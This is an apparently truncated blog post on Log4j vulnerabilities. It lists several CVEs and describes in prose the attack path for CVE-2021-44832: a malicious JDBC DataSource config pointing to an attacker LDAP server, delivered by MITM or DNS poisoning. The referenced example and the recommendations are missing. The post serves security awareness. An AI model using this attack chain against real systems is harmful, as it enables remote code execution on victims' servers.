Log4j 2.17.0 RCE Vulnerability — CVE-2021–44832

CVE-2021–44832:(JDBC Appender — RCE )

CVE-2021–45105:(Thread Context Map — Uncontrolled recursion from self referential lookups)

CVE-2021–45046:(Non-default conf. on Thread Context Map result in RCE and information leak via JNDI lookup)

CVE-2021–4104:(JMS Appender on log4j 1.2 RCE similar to CVE-2021–44228)

CVE-2021–44228:(Vulnerable JNDI — RCE)

Q1: Again JNDI? but JNDI lookup was disabled in 2.16.0?

Source: Checkmarx

Attack Path:

  1. Malicious configuration file containing the DATASOURCE element pointing to the attacker controlled LDAP referral server should be upload or hosted into a remote server or a cloud storage.
  2. When initializing the logger object, a request to the configuration file will be made, thats where the manipulation should happen to target the malicious configuration file
  3. Attacker should perform a MITM or DNS poisoning to capture and manipulate/inject the request fetching the legit Config file from a trusted remote server to the address of the attacker controlled sever hosting the malicious config file
  4. When this config.xml is loaded, containing the <Datasource jndiName> to the address of the malicious attacker controlled LDAP server, as shown below

Recommendations:

--

--

--

I am Jayaraman M, a passionate information security Analyst/Penetration Tester/Red Teamer who thrives hard to achieve greater heights in the cyber security.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Best Google Chrome Extensions For All Walks of Life {2019 Edition}

Flash Loan Attack on Plouto Vault

The Rise of Facial Recognition Technology

Top 10 VPN Services for Best Security and Privacy Online

How a vulnerability is silently fixed by Coin98

TokenSender — Easy way to batch send Erc20 tokens

KTLYO Listed!

Introduction: hot and cold wallets

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
J@1iR4m

J@1iR4m

I am Jayaraman M, a passionate information security Analyst/Penetration Tester/Red Teamer who thrives hard to achieve greater heights in the cyber security.

More from Medium

picoCTF: PW Crack 5

Step by Step Guide to Create Binance API Keys for Bitsleader

x86 Linux Reverse TCP Shellcode

Running sctest on MSF’s linux/x86/shell_reverse_tcp shellcode

Multiple SSH keys for multiple Bitbucket/GitHub accounts